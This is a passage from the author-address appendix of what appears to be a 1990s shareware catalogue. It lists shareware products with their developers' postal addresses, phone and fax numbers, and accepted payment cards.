Accepts: American Express, MasterCard, Optima, Visa + + Product: 2DO Personal Task Manager + Author: William Anderson Consulting + st + Address: 13020 N. E. 71 Court, Kirkland, WA 98033 + Orders & queries: 206-828-3675 + + Product: LinguaPro/SPANISH + Author: Schulenberg and Associates, Inc. [Craig W. Schulenberg] + Address: P.O. Box 1005, Houston, TX 77251-1005 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 713-440-4444 + + Products: Double Directory, Have You Read That Movie?, NFL + Forecaster for DOS, NFL Forecaster for Windows + Author: 100% Cotton Software + Address: RR 1 Box 1622, Hop Bottom, PA 18824 + Orders: 800-242-4775 (orders only, please) + Queries: 717-289-4019 + + Product: Timeclock I + Author: Faught Data Systems, Inc. + Address: P.O. Box 361927, Milpitas, CA 95035 + Orders & queries: 800-394-4839 + Accepts: + Fax: 408-263-2741 + + Products: The DemoMaker, Tag Line Xpress, UltiMenu + Author: Ron Janorkar + Address: 22 Prince Street, New York, NY 10012 + Orders & queries: 212-334-1243 + Fax: 212-334-1245 + + Product: SkyMap + Author: Christopher A. Marriott + Address: 9 Severn Road, Culcheth, Cheshire WA3 5ED, UNITED + KINGDOM + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 612-322-5871 + Queries: 612-322-5868 + + Appendix A, "Author addresses" 666 + + + + Products: TommySoftware CAD/DRAW, TommySoftware CAD/DRAW 4 + Level1, TommySoftware Tek Illustrator + Author: TommySoftware, N.A., Inc. + Address: 130 Barrow Street, New York, NY 10014 + Orders: 800-275-9406 (orders only, please) + Accepts: MasterCard, Visa + Fax: 212-807-8149 + Queries: 212-807-9720 + + Product: Golf Tournament Scorekeeper + Author: Home Alone Software + Address: 9630 100 Street, Edmonton, AB, T5K 0T6 CANADA + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Fax: 403-425-4404 + Queries: 403-425-4404 + + Product: DATA PROTECTOR + Author: PIGAS INC. + Address: 459 Columbus Ave. #314, New York, NY 10024 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Bridge Assistant, WinOCR + Author: SoftTech + Address: 24 Rosenthal Road, London, SE6 2BY UNITED KINGDOM + Orders & queries: 071-359-0405 + Fax: 071-539-0444 + + Products: Backup Fugue, Cellar Master for Windows, VMS40 - EMS + emulator (disk), Word Fugue, ZIP Fugue (DOS) for PKZIP/UNZIP, + ZIP Fugue (Windows) + Author: Fugue Software [David Noakes] + Address: P.O. Box 425 Capalaba QLD 4157, AUSTRALIA /or/ 20 + Arundel St, Alexandra Hills, QLD 4161, AUSTRALIA + Orders & queries: +61-7-3824-2843 + Accepts: MasterCard, Visa + Fax: +61-7-3824-2843 + + Products: Data Wire Four, dMAIL4, dVERSION, Hard Wire Four, SAC + DATABASE, Shell, Sub-contracor Billing, Version Control & + Maintenance + Author: C & R Business Systems Ltd. [Dennis Allen] + Address: P.O. Box 8227, Grand Rapids, MI 49518-8227 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 616-281-9075 + Queries: 616-281-3333 + + Appendix A, "Author addresses" 667 + + + + Products: DeskTop Advisor(R), LegRoom, MultiVu + Author: Ivden Technologies, Inc. + Address: 87 Arbor Road, Churchville, PA 18966-1007 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 610-328-1145 + Queries: 610-328-1145 + + Product: Universal Install + Author: The GoodSoft Co. + th + Address: 1630 30 Street, Suite 235, Boulder, CO 80301 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 303-444-0977 + Queries: 303-444-5747 + + Product: Book-It + Author: Instinctive Systems Ltd + Address: 5 Springfield Ter, Valley Rd, Hayfield, Stockport + SK12 5LT ENGLAND + Orders & queries: +44(0)1663-741894 + Accepts: MasterCard, Visa + Fax: +44(0)1663-741894 + + Products: Easy Backup, Easy Base, Easy Install, Easy Menu, Easy + SFX, Easy Word + Author: Easy Software [John Turnbull] + Address: 3 Brookside Court, Prestbury Road, Macclesfield, SK10 + 3BR UNITED KINGDOM + Orders & queries: +44(0)1625-614669 + Fax: 01625-614669 + + Products: Rev. Lowell's Treasury of Humor, SmilerShell + Author: Bardon Data Systems + Address: 1023 Key Route Blvd., Albany, CA 94706-2321 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 415-572-0620 + Queries: 510-526-8470 + + Product: WinSecure + Author: ViewPoint Software, Inc. + Address: 20503 Yorba Linda Blvd., Ste 554, Yorba Linda, CA + 92686 + Orders & queries: 714-777-8362 + + Products: HangWin, OpenHome + Author: Temprano Software + Address: 32 Leonardo Drive, Clifton Park, NY 12065-2038 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 668 + + + + Product: WhizNotes + Author: Advanced Supprt Group, Inc. [Sanjay Kanade] + Address: 11900 Grant Place, DES PERES, MO 63131-4512 + Orders: 800-788-0787 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 314-966-1833 + Queries: 314-965-5630 + + Product: Financial Analysis For Windows + Author: Gjetaas, Inc. [Russell C. Anderson] + Address: 7251 Mt. Baker Hwy, Deming, WA 98244 + Orders & queries: 360-599-2418 + Accepts: MasterCard, Visa + Fax: 360-599-1089 + + Products: Alarm VBX, BarCod VBX, BmpLst VBX, DFInfo VBX, FMDrop + VBX, IniCon VBX, JoyStk VBX, MenuEv VBX, MS Mega Pack (VBXes), + MSlot VBX, PerCnt VBX, Probe VBX, RoText VBX, SoundX VBX, + ZipInf VBX + Author: Mabry Software [James Shields] + Address: P.O. Box 31926, Seattle, WA 98103-1926 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 206-632-0272 + Queries: 206-634-1443 + + Product: SAB Diskette Utility + Author: Stewart A. Berman [Stewart Berman] + Address: 34 Adler Place, Suite B, Bronx, NY 10475-3901 + + Products: Around The House, Car Restoration Diary, Computer + System Manager, JailBird, Jason's File Finder, MusicEase, + Office Supplies Tracker, Paper Route Ledger, Shareware Tracker + Author: RMH Computer Services [Richard Holler] + Address: PO Box 657, Beech Grove, IN 46107-0657 + Orders & queries: 317-782-9903 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 317-784-2147 + + Product: Money Math for Windows + Author: Lovell's [Robert W. Lovell] + Address: 109 Amanda Drive, Anderson, SC 29621-2406 + Orders & queries: 864-224-2474 + + Product: ViDir/ViRes File Monitor System + Author: Vahnzinn international + Address: 412 Norristown Road, Ambler, PA 19002-2737 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 215-643-6901 + + Appendix A, "Author addresses" 669 + + + + Products: Home Refinancing, HOME/OFFICE INVENTORY, ProAct + Contact Management + Author: ProDomus, Inc. [Philip S. Will] + Address: 16 Owen Street, Hartford, CT 06105 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 203-236-7954 + Queries: 203-233-0705 + + Product: XFile + Author: Phase 33 Digital, Inc. + Address: 1346 Remsen Rd., Medina, OH 44256 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Family Calendar for Windows, QIC-BAT for CMS + Author: Command Line Software [Douglas East] + Address: 3431 Florida Dr., Loveland, CO 80538 + Orders & queries: 970-667-4566 + Accepts: Discover, MasterCard, Visa + + Products: ES-NEWS, ES-NMB, x-CAL3, x-CON3, x-FILE3, x-FONE3, x- + FONE4, x-FORUM3, x-FORUM4, x-NEWS3, x-OUT3, x-OUT4, x-SKED3 + Author: Extensions Software Corporation + Address: 1970 Osceola Parkway #350, Kissimmee, FL 34743 + Orders & queries: 407-344-3322 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 407-344-3323 + + Products: PMFLCOMP, RexxBase + Author: American Coders, LTD. [Joseph R. McVerry] + Address: POB 97462, Raleigh, NC 27624 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 919-846-2014 + + Product: RPMSHARE + Author: South Pointe Software + Address: 816 Peace Portal Drive, Suite 175, P.O. Box 880, + Blaine, WA 98231-0880 + Orders: 800-661-4480 (orders only, please) + Accepts: MasterCard, Visa + Fax: 604-538-3973 + Queries: 604-538-2326 + + Product: MotelMAX + Author: MKM Software + Address: 2812 Ingrid Lane, Metairie, LA 70003 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 504-885-7470 + + Appendix A, "Author addresses" 670 + + + + Products: BATTLE CHARGE, COLOR CROSS + Author: Cold Water Software [Gene Brown] + Address: P.O. Box 44421, Eden Prairie, MN 55344-1421 + Orders & queries: 612-906-0955 + + Product: Winvelope + Author: Winvelope Software + Address: P.O. Box 1145, Jenkins, KY 41537-1145 + Accepts: MasterCard, Visa + Fax: 606-832-2493 + Queries: 606-832-2493 + + Products: Convert It!(tm) SE, Periodic Table, Zippidy Do Da(tm) + Author: SMI Corporation + Address: P.O. Box 582221, Tulsa, OK 74158 + Orders & queries: 918-241-2301 + Accepts: MasterCard, Visa + Fax: 918-241-2301 + + Product: MicroCook + Author: NORSKi Software + Address: P.O. Box 76, Franksville, WI 53126-0076 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 414-632-9815 + + Product: TreeChart + Author: FineLine Software + Address: Newtown, Kinvara, Co. Galway, IRELAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (+353)-91-37560 + Queries: (+353)-91-37560 + + Products: Disk Drive Cleaner, Master Disk, Rosenthal UnInstall, + Rosenthal WinLite, System Monitor, Virus Simulator + Author: Rosenthal Engineering [Doren Rosenthal] + Address: P.O.Box 1650, San Luis Obispo, CA 93406 + Queries: 805-541-0910 + + Products: Jokes & Quotes, QUIK-INSTALL + Author: Michael L. Wester + Address: Route #6 Box 34, Fuquay-Varina, NC 27526 + Orders & queries: 919-552-0767 + Accepts: MasterCard, Visa + Fax: 919-362-8254 + + Products: SPANISH DRILL!, TURBO TPU TOOLKIT! + Author: LONE WOLF ENTERPRISES [John A. Jackson] + rd + Address: 1507 E. 53 Street #438, Chicago, IL 60615 + Orders: 312-734-4549 (orders only, please) + + Appendix A, "Author addresses" 671 + + + + Product: Schooner + Author: Jonathan Cook + Address: 7034 N. Cedar Ave. #108, Fresno, CA 93720 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 209-299-4958 + Queries: 209-299-4950 + + Product: Top Draw + Author: Top Software + Address: P.O. Box 1141, Conifer, CO 80433 + Orders & queries: 303-838-0384 + Accepts: MasterCard, Visa + Fax: 303-838-0384 + + Product: A Batch View + Author: Robin R. Latham + Address: P.O. Box 16152, Fort Worth, TX 76162 + Orders & queries: 817-263-4056 + Fax: N + + Product: SysChk + Author: Advanced Personal Systems [Paul Griffith] + Address: 105 Serra Way, Suite 418, Milpitas, CA 95035 + Fax: 408-945-0242 + Queries: 408-298-3703 + + Product: New Testament for Windows + Author: Rocky Mountain Laboratories + Address: P.O. Box 272224, Fort Collins, CO 80527 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 303-669-2166 + Queries: 303-679-1662 + + Product: REFILE + Author: MegAS Corporation + Address: 12401 Brookshire Parkway, Suite 200, Carmel, IN 46033 + Orders & queries: 317-844-6380 + + Product: Super!Market + Author: Trulli Tops Software, Inc. + Address: 7749 Ridgeway Dr., Mentor, OH 44060 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 216-974-5189 + + Appendix A, "Author addresses" 672 + + + + Product: Image'n'Bits + Author: Bananas Software Inc + Address: 29 Engle Rd, Paramus, NJ 07652 + Orders & queries: 201-265-9855 + + Products: EDITEUR, NoiseKiller + Author: Jean-Pierre Menicucci + Address: 18 rue de Brest, apt 243 - 35000, Rennes, FRANCE + Orders & queries: +33-9959-1228 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +33-9954-4273 + + Products: Alad_IRQ, CTS Serial Port Utilities + Author: Computer Telecommunication Systems, Inc. [John Jerrim] + Address: 3847 Foxwood Road, Suite 1000, Duluth, GA 30136-6100 + Orders & queries: 404-263-8623 + Accepts: Discover, MasterCard, Visa + Fax: 404-263-0124 + + Products: Resume Master Deluxe, The Right Resume, Thoroughbred + Handicapper Pro + Author: Whirlwind Technologies [James S Nixon] + Address: P.O. Box 1063, Van, TX 75790 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: TreePlan for DOS + Author: Decision Support Services [Michael R. Middleton] + Address: 2105 Buchanan Street #1, San Francisco, CA 94115 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-673-6217 + Queries: 415-673-6217 + + Product: Seascape + Author: Advanced Computer Tektonics [Alan Walworth] + Address: P.O. Box 51508, Palo Alto, CA 94303 + Orders & queries: 415-424-1401 + Accepts: MasterCard, Visa + Fax: 415-424-1403 + + Products: CrossWords, Econ's Arena, Equatron, Finders Keepers + Author: Glen DeBiasa + Address: 356 Gemini Drive, Apt. 4, Somerville, NJ 08876 + + Product: Music Sculptor for Windows + Author: Aleph Omega Software + Address: Box 61085 Kensington Postal Outlet, Calgary, Alberta + T2Z 1W8 CANADA + Orders: 800-2424-PSL (orders only, please) + Queries: 403-257-2115 + + Appendix A, "Author addresses" 673 + + + + Product: Personal Finances 2 + Author: Spitfire Software + Address: 325 Breakwater Ridge, Atlanta, GA 30328 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 404-257-0187 + + Products: Bike, Heart Smart, Postit for Windows, Rolodeck, + Yellow Sticky for Windows 4.5 + Author: Henning Associates [Michael R. Henning] + Address: 1710 Allied St. #36, Charlottesville, VA 22903 + Orders: 800-823-6896 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 804-295-0554 + + Products: Z & Z Color, Z & Z Puzzle + Author: Z & Z Software + Address: 1511 Norman Avenue, Lutherville, MD 21093 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Calendar Quick + Author: Logic Pulse [Brian Holdsworth] + Address: 309 Black Oak Blvd., Summerville, SC 29485 + Orders: 800-359-8341 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 803-871-9812 + Queries: 803-871-9812 + + Product: EDGEFLOW + Author: Pacestar Software [John Daleiden] + Address: P.O. Box 51974, Phoenix, AZ 85076-1974 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Visual Calendar Planner + Author: Bok Nan Lo + Address: P.O. Box 9132, Reno, NV 89507 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + + Products: IniCtrls, wfListen, wfStatus + Author: Prodigy Computing + Address: PO Box 2194, Cramerview 2060 SOUTH AFRICA + Accepts: MasterCard, Visa + Fax: 011-27-11-888-2370 + + Appendix A, "Author addresses" 674 + + + + Products: A MUSICAL TUTORIAL, A MUSICAL TUTORIAL for Windows + Author: R. Swerdfeger + Address: 3453 Marydale Ave., Cornwall, Ontario K6K 1P6 CANADA + Orders & queries: 613-933-7871 + + Products: APT Mailing Assistant, APT Mailing Assistant (OS/2), + Keyed File System (DOS), Keyed File System (OS/2) + Author: APT Computer Solutions, Inc. + Address: P.O. Box 47, Versailles, KY 40383-0047 + Orders & queries: 606-873-0589 + Accepts: MasterCard, Visa + + Products: Kith and Kin, TreeDraw + Author: SpanSoft [Nick J Hunter] + Address: 11 Rowan Terrace, Cowdenbeath, Fife KY4 9JZ, SCOTLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: +44-(0)1383-510597 + Queries: +44-(0)1383-510597 + + Product: DAZZLE + Author: Worldwide MicroTronics, Inc. + Address: P O Box 8759, Spring, TX 77387-8759 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-367-4333 + Queries: 713-298-1698 + + Product: League Manager + Author: Al Dodd Software Co. + Address: 1615 Rachel Lane, Lakeland, FL 33805 + Orders & queries: 813-683-4210 + + Products: AdMaker, Fonter, MultiLabel, Prompter - Speaker's + Utility, Rockford!, WinClip + Author: OsoSoft [George Campbell] + Address: 1472 Sixth Street, Los Osos, CA 93402 + Orders & queries: 805-528-1759 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 805-528-3074 + + Product: SQWEZ + Author: JM Software + Address: 568 Greenwich Ave., Paulsboro, NJ 08066 + Orders & queries: 609-423-1989 + + Product: Notice Board + Author: Cornerstone Software Limited [Chris Tyler] + Address: 45 Shay Lane, Hale Barns, Altrincham, Cheshire WA15 + 8PA UNITED KINGDOM + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 01044-61-904-8145 + Queries: 01044-61-904-8143 + + Appendix A, "Author addresses" 675 + + + + Product: MEG SYSTEM INFO GRAPHS PIE 3-D + Author: Jim Tolliver + Address: P.O. Box 4071, Stamford, CT 06907-0071 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 203-322-0298 + + Product: WinDatCon + Author: Vogel Scientific Software + Address: 1199 Leeward Ave., Lake Elmo, MN 55042-9643 + + Products: FontBook Professional, Report Utility for Paradox/DOS + Author: The C Group, Inc. [Mark Cohen] + Address: 1254 Rockaway Parkway, Ste. #252, Brooklyn, NY 11236 + Orders & queries: 718-251-1891 + Fax: 718-251-2059 + + Product: Contact-Lens! + Author: Kruse Control Software + Address: 30 Ridge Road, Suite 21, Ridgewood, NJ 07450 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 201-670-0677 + + Products: CULTURAL AWARENESS, MERLIN'S MATH, WRITE CHINESE + Author: Awareness Productions [Thomas Yee] + Address: P.O. Box 261262, Plano, TX 75026-1262 + Queries: 214-517-0279 + + Products: Minefield For Everybody, Tangram + Author: Judah Warshaw + Address: P.O. Box 27054, Jerusalem 91270, ISRAEL + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: +972-2-830-001 + + Product: DDE Requester for Win3.x & NT + Author: Westerdale AG [Simon Westerdale] + Address: Florastrasse 34, 4600 Olten, SWITZERLAND + Orders & queries: 41-62-260935 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 41-62-260936 + + Product: MegaWord + Author: Merlot International [Romke Soldaat] + Address: 1 ch des Moulines, 34230 St. Bauzille de la Sylve, + FRANCE + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: (+1)-314-966-1833 + Queries: (+1)-314-965-5630 + + Appendix A, "Author addresses" 676 + + + + Products: RRKeyCaps & RRKeySampler (PST1), RRKeyCaps & + RRKeySampler (TT), RRKeyCapsGerman (PST1), RRKeyCapsGerman + (TT), RRMacCaps & RRKeySampler (PST1), RRMacCaps & RRKeySampler + (TT) + Author: RoadRunner Computing [Elizabeth A. Swoope] + Address: P.O. Box 21635, Baton Rouge, LA 70894-1635 + Orders & queries: 504-928-0780 + Accepts: MasterCard, Visa + Fax: 504-928-0802 + + Products: FAXHAVEN, HQ-FAX (1-Step High Quality FAX + Author: HTF Consulting [H. Thomas FONES] + Address: 436 Whitehall Rd. #F, Alameda, CA 94501 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 800-9-SENDFH + Queries: 510-521-1689 + + Products: EMS4C Library, Personal Com Lib for PowerBASIC, + Personal Comm Lib for Pascal, Personal Comm Lib for Windows, + Personal Comm Lib Visual BASIC, Personal Comm Library for C/ + C++, Personal Comm Library VB / Win, Personal Protocol Lib 4 + Pascal, Personal Protocol Lib for C/C++, Serial File Copy + Author: MarshallSoft Computing, Inc. + Address: PO Box 4543, Huntsville, AL 35815 + Orders & queries: 205-881-4630 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 205-880-0925 + + Product: Musical Instrument Tuner + Author: SoundByte Software [Jeff O'Dair] + Address: 5907 Mendenhall Road, Indianapolis, IN 46221 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 317-856-3860 + + Products: RoboCrap.v94, TURF.v93 + Author: Second Career Software + Address: P.O. Box 283, Sierra Vista, AZ 85636-0283 + Orders: 800-242-4775 (orders only, please) + + Product: BusinessCards for Windows + Author: Michael Dvorkin + Address: 1111 Bayhill Drive #180, San Bruno, CA 94066 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-588-6149 + Queries: 415-588-6215 + + Appendix A, "Author addresses" 677 + + + + Product: CodePrint for C/C++ + Author: Geist Microsystems [Tim Kertis] + Address: 7518 Geist Estates Drive, Indianapolis, IN 46236 + Orders & queries: 317-823-1384 + Fax: N-A + + Product: LAPC - Loan Advisor for the PC + Author: J.D. Consulting Associates + Address: P.O. Box 3794, Albany, NY 12203 + Orders & queries: 518-482-5789 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 518-371-1102 + + Products: FF Business Cards, FF Designer Envelopes, FF Graphics + Conversion Utility, Financial Freedom, Financial Freedom + Billing Mgr., Financial Freedom GOLD + Author: M & R Technologies, Inc. + Address: P.O. Box 061298, Palm Bay, FL 32906-1298 + Orders & queries: 407-951-2268 + Fax: 407-951-2268 + + Product: MCBase + Author: Harry Doldersum + Address: Weerselose straat 26, 7623 DA Borne. THE NETHERLANDS + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: CALL-TO-ENABLE-FAX! + Queries: NL-(0)74-2668480 + + Products: Backup, Card Flash, Color Fun, Declaration of War, + Early Bird, EZinst, Hang Man, Medieval War, Medieval War Door, + Wndlib + Author: Burnham Park Software, Inc. + Address: P.O. Box #814, Chicago, IL 60690-0814 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 312-922-6313 + + Product: Wall Street Simulator - Windows + Author: Larax Software + Address: PO Box 606, Sherman, CT 06784 + + Product: Mystic Pixels + Author: Tesuji Technology [Ronald G. White] + Address: P.O. Box 4305, Boulder, CO 80306-4305 + + Product: GAKUSEI + Author: Barham Software + Address: 15507 S. Normandie Ave. #245, Gardena, CA 90247-4028 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 310-327-4862 + + Appendix A, "Author addresses" 678 + + + + Product: FundRaiser Basic + Author: Professional Support Software [Gene Weinbeck] + Address: 106 Garfield Ave, PO Box 901, West Plains, MO 65775 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 417-256-6370 + Queries: 417-256-4280 + + Product: Water and Steam Properties + Author: Katmar Software [Harvey Wilson] + Address: PO Box 654, Westville 3630, SOUTH AFRICA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Landscape Explorer + Author: WoolleySoft + Address: Humblesknowe Cottage, Ramoyle, Dunblane, Perthshire + FK15 0BA SCOTLAND + Orders & queries: 0786-825406 + + Product: RPF Zip Control + Author: RPF Software [Frank B. Fortson] + Address: P.O. Box 420457, Atlanta, GA 30342 + Fax: 404.250.0282 + + Product: RADIOSIM + Author: BREMENSON [Claude BREMENSON] + Address: 60 rue d'Herblay, 95150 Taverny, FRANCE + Accepts: MasterCard, Visa + Fax: 33-1-39-32-11-97 + + Products: Examine, ExamineZip, PentaBlox + Author: Aquila Software [Trevor Poile] + Address: P O Box 137, Tunbridge Wells, Kent TN4 0YN UNITED + KINGDOM + Orders & queries: +44-(0)1892-531108 + + Product: Zip Pro + Author: Synaptek Software + Address: 1188 Ostler Ct, Mississauga, ON L5C 3G6 CANADA + Orders: 800-465-7047 (orders only, please) + Accepts: MasterCard, Visa + Fax: 905-897-7622 + Queries: 905-276-8835 + + Appendix A, "Author addresses" 679 + + + + Product: Property Master + Author: MSdataBase Solutions + Address: 614 Warrenton Terrace NE, Leesburg, VA 22075 + Orders & queries: 703-777-5660 + Accepts: Discover, MasterCard, Visa + Fax: 703-777-5440 + + Products: I&M USA, INSTINDX, INSTSPEC, Sales & Samples + Author: C T Johnson, Inc + Address: 8126 Forestdale Dr., Charlotte, NC 28227 + Orders & queries: 704-568-9598 + Fax: 704-532-1236 + + Product: File Manager Jr. + Author: Charles R. Maher + th + Address: 409 North 18 Street, Coeur d'Alene, ID 83814-5460 + Orders: 800-215-3688 (orders only, please) + Accepts: MasterCard, Visa + Fax: 208-664-9743 + Queries: 208-664-3864 + + Product: Photo Show 3D + Author: Progressive Logic [Keith A. Marshall] + Address: P.O. Box 561420, Charlotte, NC 28256-1420 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: Windows Gourmet, WINstall + Author: Dovcom + Address: P.O. Box 580, Provo, UT 84603-0580 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 801-221-4527 + + Appendix A, "Author addresses" 680 + + + + Product: Katelin Comment Manager + Author: Katelin, Inc. + Address: 610 N. Main, Georgetown, IL 61846 + Orders & queries: 217-662-6780 + + Products: CrabWise, Search-N-Store + Author: Shawn Anderson SoftWare + Address: PO Box 1481, Milan, IL 61264 + Orders & queries: 309-787-4967-(X227) + Fax: 309-787-8351 + + Product: NoteWorthy + Author: Braeburn Software [Bernard Hill] + Address: Hawthorn Bank, Scott's Place, Selkirk TD7 4DP + SCOTLAND + Orders & queries: +44-1750-721854 + Accepts: MasterCard, Visa + + Product: The Lawyer's DeskTop + Author: DataPro Enterprises, Inc. + Address: 11200 Westheimer, Suite 923, Houston, TX 77042 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-493-5429 + Queries: 713-978-7431 + + Product: Spanish Helper Level One + Author: G.B. Blanchard + Address: Aptdo. de Correos 555, 29680 Estepona, Malaga SPAIN + Orders: 800-445-3346 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 218-228-5879 + Queries: 212-598-4939 + + Product: SC-Scripter + Author: SplitCycle Computing + Address: 13102 Rivergate Lane, Jacksonville, FL 32223 + Orders & queries: 904-292-4770 + + Product: Beam Cookbook + Author: SoftEngineering + Address: 1278 Glenneyre Street #185, Laguna Beach, CA 92651 + Queries: 714-497-3952 + + Products: JRE Home Inventory, My Life, Win Change, Win Multiple + Configurations, Writer's Cramp + Author: JRE Enterprises + Address: P.O. Box 5643, Mesa, AZ 85211-5643 + + Appendix A, "Author addresses" 681 + + + + Products: 3.5" Disk Label Creator for Wor, AMF Daily Planner & + P.I.M., AMF Intelligent Organ for Win, AMF Multimedia Jukebox + (WIN), Business Cards for Word, CD Player for Word, Colored + Toolbar Icons for Word, Elbow Grease for Windows, Mouse Clock + (tm) for Windows, P.I.M. for Word for Windows, Toolbar 2X for + Word 6, WINFAX PRO and Word Fax Macro, Wordware for Word for + Windows + Author: AMF [Andrew M. Freeman] + Address: P.O. Box 189, Holbrook, NY 11741-0189 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: REALIZE + Author: Transcendental Technologies + Address: 17 Beechwood cl., East Doncaster, Victoria 3109 + AUSTRALIA + + Products: Loan Master, PCLoan5 + Author: Bottom Line Software, Inc. + Address: P.O. Box 118826, Carrollton, TX 75011-8826 + Orders & queries: 214-394-4087 + Accepts: MasterCard, Visa + Fax: 214-394-4170 + + Product: New Menus for Windows + Author: Dipl.Ing. Roger Rene Kommer + Address: Doernbergstr. 11, D-34119 Kassel, GERMANY + Orders: 800-414-4268 (orders only, please) + Accepts: Discover, MasterCard, Visa + Fax: 910-350-2937 + Queries: 910-791-7052 + + Products: Crypto!, FSave, PC-TimeClock + Author: KMR Consulting [Kenneth A. Reek] + Address: 3090 Griffin Rd, Churchville, NY 14428 + Orders & queries: 716-293-3241 + + Product: Neural Network VBX + Author: ENSOFT [Joan Vilaseca Corbera] + Address: Rbla. Egara 243, 08224 Terrassa BCN SPAIN + Orders & queries: 34-77-862688 + Accepts: Visa + Fax: 34-77-862688 + + Product: Basketball Statistics + Author: Gentle Productions + Address: P.O. Box 152, Shelby, MI 49455 + Orders & queries: 616-861-5157 + Accepts: MasterCard, Visa + + Product: File Finder/Grouper + Author: EnGamma + Address: 2407 Cameron Mills Rd., Alexandria, VA 22302-3302 + Queries: 703-548-6869 + + Appendix A, "Author addresses" 682 + + + + Product: PageFocus + Author: Creative Stars, Inc. + Address: P.O. Box 2794, Redmond, WA 98073 + Orders & queries: 206-485-1737 + Accepts: MasterCard, Visa + Fax: 206-487-0980 + + Product: Poster + Author: PosterSW [Robert Bedoll] + th + Address: 11002 48 St. E., Puyallup, WA 98372 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-848-0467 + + Product: FCV + Author: Nounfield Ltd. [Andy Wilson] + Address: PO Box 3277, Great Wigborough, Essex CO5 7RX UNITED + KINGDOM 